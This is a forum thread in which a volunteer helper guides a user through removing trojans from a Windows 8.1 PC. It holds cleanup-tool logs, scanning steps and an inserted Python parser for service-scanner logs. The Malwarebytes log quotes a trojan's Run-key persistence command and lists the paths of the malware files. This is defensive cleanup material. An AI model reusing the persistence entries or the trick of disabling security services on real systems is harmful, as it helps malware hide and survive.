C:\Windows\System32\Tasks\Security Center Update - 1259602875 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1259602875" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A31D10D4-B4CF-4475-B02B-0A9BEB4E6617}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A31D10D4-B4CF-4475-B02B-0A9BEB4E6617}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2329648882 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2329648882" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A3FB09EC-C469-45ED-8A04-7E9497A4358B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A3FB09EC-C469-45ED-8A04-7E9497A4358B}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 532629427 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 532629427" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ACE571AA-4750-4BA4-9AB7-285B651F13E4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ACE571AA-4750-4BA4-9AB7-285B651F13E4}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 578871115 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 578871115" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B1AE1850-9814-4733-A837-1BCFDCA93C2F}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1AE1850-9814-4733-A837-1BCFDCA93C2F}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1433702555 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1433702555" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2786531556 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2786531556" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B31AB263-6E64-4AE6-9131-F03F3EB11C96}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B31AB263-6E64-4AE6-9131-F03F3EB11C96}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2649167008 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2649167008" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B69D26CC-F736-43EF-8678-4047B1182B5E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B69D26CC-F736-43EF-8678-4047B1182B5E}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4109173847 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4109173847" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BA2069FF-78E4-45BC-B55E-CD0ACD43F066}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA2069FF-78E4-45BC-B55E-CD0ACD43F066}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2002689914 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2002689914" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BB68D13D-D1D6-492F-8D8C-218D8F32F366}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BB68D13D-D1D6-492F-8D8C-218D8F32F366}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3566967998 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3566967998" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C0214B00-381D-48C6-8657-2096534B77ED}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C0214B00-381D-48C6-8657-2096534B77ED}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2047020247 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2047020247" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C8F0BD03-484C-4EA4-B730-E73FCF57C579}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C8F0BD03-484C-4EA4-B730-E73FCF57C579}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1058146964 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1058146964" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCE07978-A743-41CE-84CE-1E73B09468DB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCE07978-A743-41CE-84CE-1E73B09468DB}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4056442320 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4056442320" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D272D6E1-FF48-4D29-8FED-3859A8299DC8}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D272D6E1-FF48-4D29-8FED-3859A8299DC8}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 446489216 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 446489216" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DAF472B5-87C9-4EB7-BD1F-23897D28E7CF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DAF472B5-87C9-4EB7-BD1F-23897D28E7CF}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4131681425 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4131681425" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DD416C59-DA11-4673-95DF-6CCB71853F43}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DD416C59-DA11-4673-95DF-6CCB71853F43}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2300971329 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2300971329" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F0BDD635-04A8-43FD-B541-D9182F90415D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F0BDD635-04A8-43FD-B541-D9182F90415D}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4105554909 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4105554909" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F9426B1C-C5B8-43C1-9B81-F5F6932587E9}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9426B1C-C5B8-43C1-9B81-F5F6932587E9}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 700698430 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 700698430" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FA7D302B-25B4-4938-976B-AFD59ED105BC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA7D302B-25B4-4938-976B-AFD59ED105BC}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3992158093 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3992158093" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FDF8C72F-4705-4C83-B0F3-47690D02FCBE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FDF8C72F-4705-4C83-B0F3-47690D02FCBE}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4183678770 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4183678770" => Key deleted successfully.
"HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key deleted successfully.
"HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => Key not found. 
 
=> Result of Scheduled Files to move (Boot Mode: Safe Mode (with Networking)) (Date&Time: 2015-02-24 06:09:16)<=
 
"C:\Users\Dorothy01\AppData\Roaming\????" => Directory could not move.
 
==== End of Fixlog 06:09:16 ====


#7
dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts
Let's see if we can get that last bit of process eating identified and removed ....

First, an AdwCleaner scan >>>>

AdwCleaner by Xplode

Download AdwCleaner from here or from here. Save the file to the desktop.

NOTE: If you are using IE 8 or above you may get a warning that stops the program from downloading. Just click on the warning and allow the download to complete.

Close all open windows and browsers.
  • Vista/7/8 users: Right click the AdwCleaner icon on the desktop, click Run as administrator and accept the UAC prompt to run AdwCleaner.
    You will see the following console:

  • Click the Scan button and wait for the scan to finish.
  • After the Scan has finished the window may or may not show what it found and above, in the progress bar, you will see: Pending. Please uncheck elements you don't want to remove.
  • When the Scan has finished the Scan button will be grayed out and the Clean button will be activated.
  • Click the Clean button.
  • Everything checked will be deleted.
  • When the program has finished cleaning a report appears.
  • Once done it will ask to reboot; allow this.
  • On reboot a log will be produced; please copy / paste that in your next reply. This report is also saved to C:\AdwCleaner\AdwCleaner[S0].txt
Optional:

NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why and Here. You can always Reinstall it.


Second, scan with MalwareBytes Antimalware >>>>

Malwarebytes' Anti-Malware
Please start Malwarebytes' Anti-Malware from either the Start Menu shortcut or your desktop shortcut (if you have one).
  • When the main screen opens, if the database is out of date, you can click on the Fix Now banner or the Update Now link.
  • Once the program has loaded and updated, select "Scan Now >>" to start the scan.
  • The scan may take some time to finish, so please be patient.
  • If any malware is found, make sure that everything is checked, and click Remove Selected.
  • When the scan is complete, click View detailed log >> to view the results.
  • The report screen will open.
  • At the bottom click on Export and select as txt file, save the file to your desktop and click OK. When the export is complete, select OPEN.
  • The log file will be opened in your default text file viewer (usually Notepad); select the whole text (Ctrl + A) and copy (Ctrl + C) it to paste here in a reply.
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts. Click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately.


Third, a Farbar Services Scan >>>>

This will check on the essential OS services and see if there are any that need to be reset.

Please download Farbar Service Scanner to your desktop and double click on the file to run it.
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center
    • Windows Update
    • Windows Defender
    • Other Services
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.
Information to Reply with >>>>
  • The AdwCleaner[S#].txt log file.
  • The MBAM scan log.
  • The FSS.txt log file.


#8
allforhimblog

    Member

  • Topic Starter
  • Member
  • 98 posts

It seemed to me that ADWCleaner didn't find anything; here's the log:

 

# AdwCleaner v4.111 - Logfile created 25/02/2015 at 01:51:15
# Updated 18/02/2015 by Xplode
# Database : 2015-02-18.3 [Server]
# Operating system : Windows 8.1  (x64)
# Username : Dorothy01 - DOROTHY
# Running from : C:\Users\Dorothy01\Desktop\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17126
 
 
-\\ Google Chrome v40.0.2214.115
 
 
*************************
 
AdwCleaner[R0].txt - [2576 bytes] - [19/02/2015 21:33:55]
AdwCleaner[R1].txt - [1712 bytes] - [20/02/2015 06:29:39]
AdwCleaner[R2].txt - [962 bytes] - [25/02/2015 01:45:08]
AdwCleaner[S0].txt - [2496 bytes] - [19/02/2015 21:38:33]
AdwCleaner[S1].txt - [1792 bytes] - [20/02/2015 06:33:36]
AdwCleaner[S2].txt - [890 bytes] - [25/02/2015 01:51:15]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [948  bytes] ##########
 
 
 
Now Malwarebytes did, and after the reboot the system does seem much much faster. Here's the log for that scan.
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 2/25/2015
Scan Time: 1:58:36 AM
Logfile: 
Administrator: Yes
 
Version: 2.00.4.1028
Malware Database: v2015.02.25.03
Rootkit Database: v2015.02.22.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: Dorothy01
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 342048
Time Elapsed: 38 min, 35 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 1
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Roaming\BtvStack.dll, Delete-on-Reboot, [eeb98a983c4e51e598db52d40200926e], 
 
Registry Keys: 2
Trojan.Bunitu, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\kycnage, Quarantined, [0e99fa284446f244acbc615fb0553fc1], 
Trojan.FakeMS.SVSGen2, HKLM\SOFTWARE\CLASSES\CLSID\{2D349E57-23E4-4A67-9624-F1DC6B65AABF}, Quarantined, [347327fb107a94a289eaa2f152af3fc1], 
 
Registry Values: 1
Trojan.Bunitu, HKU\S-1-5-21-1427692388-1042374531-2795145444-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|kycnage, rundll32 "C:\Users\Dorothy01\AppData\Local\kycnage.dll",kycnage, Quarantined, [0e99fa284446f244acbc615fb0553fc1]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 24
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Roaming\BtvStack.dll, Delete-on-Reboot, [eeb98a983c4e51e598db52d40200926e], 
Trojan.Bunitu, C:\Users\Dorothy01\AppData\Local\kycnage.dll, Quarantined, [0e99fa284446f244acbc615fb0553fc1], 
Trojan.FakeMS.SVSGen2, C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\appmgr.dll, Delete-on-Reboot, [347327fb107a94a289eaa2f152af3fc1], 
Trojan.Crypt, C:\Users\Dorothy01\AppData\Local\Temp\~00F12F87.tmp, Quarantined, [278042e0513987af9437e5ddb451d12f], 
Trojan.Agent.B47Gen, C:\Users\Dorothy01\AppData\Local\Temp\C84A.tmp, Quarantined, [901727fb385274c2f2d65bcdc73bce32], 
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Local\Temp\1663.tmp, Quarantined, [4d5a849ebbcf2e08fc2a62c5758d3ac6], 
Trojan.Krypt, C:\Users\Dorothy01\AppData\Local\Temp\8D2A.tmp, Quarantined, [b8eff2308703e254fd838f99a959b848], 
Trojan.Agent.ED, C:\Users\Dorothy01\AppData\Local\Temp\3E65.tmp, Quarantined, [f1b665bd90fa39fd5895ef3727db9c64], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\6579.tmp, Quarantined, [adfa2ef4a5e5d462f2f0be4fad55936d], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\EFF2.tmp, Quarantined, [d4d3d44e5f2b60d635ad7895b64c4fb1], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\F727.tmp, Quarantined, [6245ca58cebc79bd23bf60ad7b871ee2], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\5157.tmp, Quarantined, [87202bf7553540f69a48937ab54d2cd4], 
Trojan.Agent.FSAVXGen, C:\Users\Dorothy01\AppData\Local\Temp\FE3C.tmp, Quarantined, [f2b569b96d1d171f5420cbd78f72a957], 
Trojan.Agent.ED, C:\Users\Dorothy01\AppData\Local\Temp\5774.tmp, Quarantined, [c3e446dc3654e35346c373b24ab89868], 
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Local\Temp\5C28.tmp, Quarantined, [93148c9696f4181e1c5748ded32f827e], 
Trojan.FakeMS, C:\Users\Dorothy01\AppData\Local\Temp\7A25.tmp, Quarantined, [1691fb27c0ca6cca9013f13449b911ef], 
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Local\Temp\44BF.tmp, Quarantined, [3f68a97999f1e05626adbf6705fd54ac], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\6E34.tmp, Quarantined, [10970220e6a472c48062c845c042c23e], 
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Local\Temp\7223.tmp, Quarantined, [e7c080a22c5e2d091b398b9b0200728e], 
Trojan.Agent.FSAVXGen, C:\Users\Dorothy01\AppData\Local\Temp\9549.tmp, Quarantined, [94133de517734aecdb999b07ce33d828], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\6ADE.tmp, Quarantined, [565157cb0585ce688d551eef946e12ee], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\D4F6.tmp, Quarantined, [377034ee1f6bd561e6fcb85535cd6d93], 
Trojan.Ransom.ED, C:\Windows\Installer\{4D0AE95F-8433-47D9-B1BA-3F7757741FBD}\api-ms-win-system-FntCache-l1-1-0.dll, Quarantined, [446374ae5139b086ecf00026a65cf50b], 
Trojan.Inject.ED, C:\Windows\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe, Quarantined, [bfe8948ed9b1fd3928dd02e95da46e92], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
And here is the FSS Scan
 
Farbar Service Scanner Version: 17-01-2015
Ran by Dorothy01 (administrator) on 25-02-2015 at 02:49:01
Running from "C:\Users\Dorothy01\Desktop"
Microsoft Windows 8.1  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
wscsvc Service is not running. Checking service configuration:
The start type of wscsvc service is set to Disabled. The default start type is Auto.
The ImagePath of wscsvc service is OK.
The ServiceDll of wscsvc service is OK.
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Disabled. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
BITS Service is not running. Checking service configuration:
The start type of BITS service is set to Disabled. The default start type is Auto.
The ImagePath of BITS service is OK.
The ServiceDll of BITS service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.
The ImagePath of WinDefend: ""%ProgramFiles%\Windows Defender\MsMpEng.exe"".
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****

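Added example (not part of the thread, and not Farbar's code): a Python parser run over lines trimmed from the FSS.txt log above. It pulls out the findings a helper acts on: services that are not running, start types that differ from the default the log states, and policy values such as DisableAntiSpyware. The names `parse_fss`, `FssFindings` and `disabled_services` are made up for this example, and treating any File Check result other than "File is digitally signed" as needing review is an assumption.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: lines copied from the FSS.txt log posted above, trimmed.
SAMPLE_FSS_LOG = r'''
Firewall Disabled Policy: 
==================

Action Center:
============

wscsvc Service is not running. Checking service configuration:
The start type of wscsvc service is set to Disabled. The default start type is Auto.
The ImagePath of wscsvc service is OK.

Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Disabled. The default start type is Auto.

BITS Service is not running. Checking service configuration:
The start type of BITS service is set to Disabled. The default start type is Auto.

Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.

Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1

File Check:
========
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
'''

NOT_RUNNING = re.compile(r"^(\S+) Service is not running\.")
START_TYPE = re.compile(
    r"^The start type of (\S+) service is set to (\w+)\. "
    r"The default start type is (\w+)\."
)
REG_KEY = re.compile(r"^\[(HKEY_[^\]]+)\]$")
REG_VALUE = re.compile(r'^"([^"]+)"=(\w+):(.+)$')
FILE_RESULT = re.compile(r"^(.+?) => (.+)$")


@dataclass
class FssFindings:
    stopped: list = field(default_factory=list)        # service names
    start_changed: list = field(default_factory=list)  # (service, current, default)
    policies: list = field(default_factory=list)       # (section, key, name, data)
    unsigned: list = field(default_factory=list)       # (path, result text)


def parse_fss(text):
    """Collect the deviations an FSS log reports, recognised by line format."""
    found = FssFindings()
    section, prev, reg_key = None, "", None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if set(line) == {"="}:
            # A row of '=' underlines the previous line, which names the section.
            section, reg_key = prev.rstrip(": "), None
            continue
        prev = line
        if m := NOT_RUNNING.match(line):
            found.stopped.append(m.group(1))
        elif m := START_TYPE.match(line):
            service, current, default = m.groups()
            if current != default:
                found.start_changed.append((service, current, default))
        elif m := REG_KEY.match(line):
            reg_key = m.group(1)
        elif reg_key and (m := REG_VALUE.match(line)):
            found.policies.append((section, reg_key, m.group(1), m.group(3)))
        elif section == "File Check" and (m := FILE_RESULT.match(line)):
            # Assumption: any result other than this exact text needs a look.
            if m.group(2) != "File is digitally signed":
                found.unsigned.append((m.group(1), m.group(2)))
    return found


def disabled_services(found):
    """Services that cannot start at all, as opposed to on-demand ones."""
    return [svc for svc, current, _ in found.start_changed if current == "Disabled"]


if __name__ == "__main__":
    result = parse_fss(SAMPLE_FSS_LOG)
    print("Not running:", ", ".join(result.stopped))
    print("Disabled:   ", ", ".join(disabled_services(result)))
    for section, key, name, data in result.policies:
        print(f"Policy:      {key}\\{name} = {data} ({section})")
```

On this log it separates the three services set to Disabled (wscsvc, wuauserv, BITS) from WinDefend, which is set to Demand and is also held off by the DisableAntiSpyware policy value.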

#9
dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts

Ok; let's get the services back to running properly and then on to the last scan.
 
First, reset OS services to default values.
 
Download Tweaking.com's Set Windows Services to Default Startups.
 
Double click on the file to start the extraction of the executable files.  Click Yes to the User Account Control (if it opens) to start the program.  Click the Start button on the program and allow the program to apply the needed changes.  If all goes well, it should just apply the changes and then show you the status of the changes in the main window of the program.
 
Once it is finished, please restart your system to have all the changes take effect.
 
Second, an ESET Online Scanner look at the system
 

ESET Online Scanner:

Note: You will need to disable your current installed Anti-Virus for the duration of the online scan, how to do so can be read here. Also, please note that this scan can take a while to run.

  • Please go here to run the scan and click on Run ESET Online Scanner
  • The next screen will be the ESET Online Scanner installer
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer and select Save File
  • Save the file to your desktop; you should see a file like this when the download is finished
  • Double click on this to start the installation of the ESET Online Scanner
  • In the new window that appears select the option YES, I accept the Terms of Use then click on Start
  • Now in the Computer scan settings window that appears:
  • Make sure that the option Enable detection of potentially unwanted applications is selected.
  • Now click on Advanced Settings and configure the options as follows:
    • Remove found threats is Not checked
    • Scan archives is checked
    • Scan for potentially unsafe applications is checked
    • Enable Anti-Stealth Technology is checked
  • Now click on: Start
  • The virus signature database... will begin to download. Be patient; this may take some time depending on the speed of your Internet connection.
  • When completed the Online Scan will begin automatically.
  • Do not touch either the mouse or keyboard during the scan, otherwise it may stall.
  • When completed, if any malware was detected, the summary screen will show a warning.
  • On the Scan results detail window, select to Export to text file, name the file ESET scan results.txt and save it to your desktop.
  • Click <<Back once the file is saved, select 'Uninstall application on close' and click on Finish.
  • Use Notepad to open the logfile you saved on your desktop.
  • Copy and paste that log as a reply to this topic.

Note: Do not forget to re-enable your Anti-Virus application after running the above scan!



#10
allforhimblog

    Member

  • Topic Starter
  • Member
  • 98 posts

Okay, I tried multiple times to run the ESET scanner and each time it would hang at a different spot.  This is as far as I got, 49%.  On a bright note, I can update Windows again, so woooo!!!

 

 

 

C:\FRST\Quarantine\C\ProgramData\bamgaq\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\ProgramData\bamgaq\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\ProgramData\PenulErhig\EuyogZifji.lxo a variant of Win32/Kryptik.CZEF trojan
